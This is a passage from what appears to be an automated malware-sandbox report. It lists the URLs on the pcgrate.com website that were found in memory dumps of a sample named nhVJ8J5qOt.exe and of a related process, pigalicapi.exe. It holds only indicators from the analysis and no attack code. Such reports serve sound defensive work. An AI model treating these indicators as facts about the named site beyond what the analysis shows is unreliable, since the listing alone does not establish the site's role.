nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Newport-logo-76F09AD2F3-seeklogo.com_-e1626287837846.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-150x150.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-200x200.jpg
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-300x298.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/bae_systems-1.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/horiba_1.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/logo_01-1.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F&#038;format=xm
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/wp/v2/pages/1009
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/xmlrpc.php?rsd
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581046639.0000000005120000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.660330764.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.657456141.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 